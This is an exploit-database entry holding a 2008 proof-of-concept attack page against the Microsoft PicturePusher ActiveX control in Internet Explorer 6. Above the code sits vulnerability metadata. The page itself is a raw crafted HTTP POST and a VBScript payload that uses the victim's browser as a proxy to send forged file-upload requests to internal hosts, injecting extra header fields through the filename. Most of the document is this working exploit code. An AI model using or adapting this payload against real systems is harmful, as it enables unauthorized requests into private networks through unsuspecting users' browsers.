Microsoft PicturePusher ActiveX (PipPPush.DLL 7.00.0709) remote Cross Site File Upload attack POC (IE6)

vendor:

PicturePusher ActiveX

by:

Nine:Situations:Group::pyrokinesis

8.8

CVSS

HIGH

Cross Site File Upload attack

N/A

CWE

Product Name: PicturePusher ActiveX

Affected Version From: Microsoft Digital Image 2006 Starter Edition

Affected Version To: Microsoft Digital Image 2006 Starter Edition

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: IE6, IE7

2008

Microsoft PicturePusher ActiveX (PipPPush.DLL 7.00.0709) remote Cross Site File Upload attack POC (IE6)

This control allows to build highly customized POST requests against private upload facilities, using the browser as a proxy to bounce them and by injecting a filename sub-field through ex. the AddString() method.

Mitigation:

RegKey Safe for Script: False, RegKey Safe for Init: False, Implements IObjectSafety: True, IDisp Safe: Safe for untrusted: caller,data

Source

Exploit-DB raw data:

<!--
Microsoft PicturePusher ActiveX (PipPPush.DLL 7.00.0709) remote Cross Site File 
Upload attack POC (IE6)
by Nine:Situations:Group::pyrokinesis

bug discovered by rgod during early March 2008

tested software: Microsoft Digital Image 2006 Starter Edition
works fine against IE6, with some warnings with IE7

dll settings: 
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data 

This control allows to build highly customized POST requests against private 
upload facilities, using the browser as a proxy to bounce them and by injecting 
a filename sub-field through ex. the AddString() method

The magic packet :

POST /?aaaa=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control]
Host: 127.0.0.1
Content-Length: 181
Cache-Control: no-cache

-----------------------------
Content-Disposition: form-data; name="aaaa"; filename="suntzu.test" 
Content-Type: text/plain; AAAA: ""

xxxxxxxx
-------------------------------

-->
<HTML>
<OBJECT classid='clsid:507813C3-0B26-47AD-A8C0-D483C7A21FA7' id='PicturePusherControl' />
</OBJECT>
<script language='vbscript'>
    'PicturePusherControl.PostURL = "http://127.0.0.1/?aaaa=1"
    PicturePusherControl.PostURL = "http://192.168.1.1/?aaaa=1"
    PicturePusherControl.AddSeperator
    CRLF = unescape("%0d%0a")
    FormElementName="aaaa""; filename=""suntzu.test"" " + CRLF + "Content-Type: text/plain; AAAA: """
    Value="xxxxxxxx"
    'for some reason cannot do this with AddFile() method, however...
    PicturePusherControl.AddString FormElementName ,Value 
    PicturePusherControl.Post
</script>

# milw0rm.com [2008-10-08]